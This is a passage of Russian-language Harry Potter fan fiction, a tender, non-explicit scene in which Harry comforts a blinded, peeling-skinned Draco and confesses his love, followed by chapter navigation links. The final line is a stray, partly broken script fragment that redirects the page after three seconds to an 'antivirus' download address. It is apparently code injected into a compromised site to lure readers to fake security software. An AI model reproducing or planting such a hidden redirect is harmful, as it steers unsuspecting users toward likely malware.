- Храбрость - это вовсе не отсутствие страха, - словно повторяя за кем-то, ответил Гарри. – Быть храбрым - значит делать то, что нужно, даже если тебе страшно.

С этим Драко легко мог согласиться, но вот «делать то, что нужно» в его случае означало, что он сбежит и спрячется, предоставив кому-нибудь другому сражаться вместо него. Он не думал, что его позиция когда-нибудь изменится, и невесело усмехнулся.

- Значит, ты любишь меня потому, что я безнадежный трус, - пробормотал он.

И замер, осознав, что именно сказал. В комнате наступила тишина. Драко боялся пошевелиться. Он не был уверен, чего именно боится, просто боялся.

- Да, - прошептал Гарри, словно только сейчас понял это. – Думаю, люблю.

Драко не мог видеть его ясно, но ему показалось, что гриффиндорец поднял голову и посмотрел прямо на него.

- Драко, я бы не стал сидеть в горяченной воде и изображать из себя живой матрас ни для кого другого. Но для тебя я могу делать это вечно, - он приглашающе протянул руку: - Ты знаешь, что я не причиню тебе зла.

Чепуха. Все эти разговоры – самая настоящая чепуха. Ничего подобного он не знает. Гарри сам сказал, что ударит его, если он назовет кого-нибудь грязнокровкой. И  потом, Мальчик-Который-Выжил просто обязан спасать всех страждущих, разве нет? Видимо, даже темных магов. И неважно, что для темных магов, особенно для Малфоев, никто никогда не делал ничего подобного. Прикусив губу, Драко плотнее запахнул мантию и вдруг вспомнил, что это мантия Гарри.

- У меня кожа отслаивается, - прошептал он. – Это отвратительно. Вряд ли тебе понравится.

- Неужели тебе в самом деле хочется сидеть одному, слепому, в углу?

Конечно нет. И какой смысл иметь Гарри рядом, если Драко не может извлечь из этого никакой выгоды?

Осторожно, робко он опустился в воду, подполз к гриффиндорцу и забрался к нему на колени. Теплые руки Гарри обняли его, и Драко поморщился, ощутив, как словно бумага сморщилась отслаивающаяся кожа. Он с ужасом услышал собственное шипение, но Гарри или не обратил на него внимания, или оно его не волновало. Он просто держал Драко, помогая снять напряжение со спины и давая опору, чтобы тому не пришлось лежать на животе, как животному. Через несколько минут Драко смог расслабиться, не без помощи Гарри, который гладил его по голове – единственной части его тела, которая не будет линять.

- Что это, у тебя на шее? - вдруг спросил Гарри. – Зелье?

- Амулет на удачу, - солгал Драко, как никогда отчетливо ощущая на груди вес маленького виала. Поначалу он так жаждал создать этот амулет. Теперь же боялся его уничтожить.

Предыдущая глава   Оглавление   Следующая глава
Продолжение следует...

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>